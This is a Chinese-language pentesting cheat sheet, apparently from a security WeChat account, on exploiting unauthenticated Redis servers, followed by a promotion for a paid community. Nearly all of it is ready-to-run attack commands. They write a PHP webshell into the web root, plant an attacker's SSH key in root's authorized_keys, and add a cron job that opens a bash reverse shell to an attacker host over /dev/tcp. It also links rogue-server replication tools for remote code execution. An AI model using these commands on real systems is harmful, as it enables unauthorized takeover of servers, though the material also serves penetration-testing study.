未授权
可以利用超级弱口令工具来判断redis是否能未授权登录
telnet
#尝试登录info
#查看redis信息
RCE方法
写shell
- 需要写权限
- 需要知道web网站路径
config set dir /var/www/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
save
写SSH key
- 需要写入到 /.ssh 权限
创建秘钥
cd /root/.ssh/
ssh-keygen -t rsa
config set dir /root/.ssh/
config set dbfilename authorized_keys
set test "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCvhnGwlnksH9fuSnIUrcB9B07lgK9LOttwAGdCB0SxhTXElvZ3o6ZLtncQrJhDM30pjFuk17bFqzYmPNMnTEA3IueJ2/kuNBNsfax+7vMV9vwycm4v2bCGdIxRaSeQ8j0y613JC6ZJMHynEOAPe9k6r+K788iUXE0CJ2kPib7Cee9tGduoUKLwuPUwpJnFc+5feOtBv3NNiSBjb42c3vHNg/mWHYf6FD9JfgIC1rScNiFv+pOwUJQbsbfO7JFgSkBFqBwO5TtI60m/NSL+H3DNQqZ+1rlOzYnMqLs5Eh8dqqigN4DUskd5u8HRNBdp4o94yvcwEbcr2WpVE7S2Ztdfa2+IuB9gdoSa84iVLNzMMoqUFewTbBZPKPYh5uzhuECbrmmsEQZG/VeQM5ErgjC7n01Xsvykh7/zsVUWL3qOQv2VdbbCzIelZS912uyx/gZ3U6JMh5F3Ggza/1qQHyVPejOmVZLJADH+6TAXr9rdxp6pbDY0P0jTUP8DjsE5avE= f1ve@hacker\n\n"
save
ssh -i id_rsa root@ip
写计划任务
- 写入权限
- 仅适用于Centos
set x "\n* * * * * bash -i >& /dev/tcp/vps ip/55555 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
主从复制
利用以下的工具来进行主从复制
https://github.com/n0b0dyCN/redis-rogue-server
https://github.com/vulhub/redis-rogue-getshell
参考:
6379 - Pentesting Redis | Chinese - Ht | HackTricks
微信公众号
扫一扫关注CatalyzeSec公众号
加入我们的星球,我们能提供:
1对1就业指导、面试模拟、Golang工具开发学习、Fofo高级会员、各公众号历史文章合集、各种网络安全电子书、面试题合集、最新poc、exp、最常用工具推荐、开放交流环境,解决成员问题。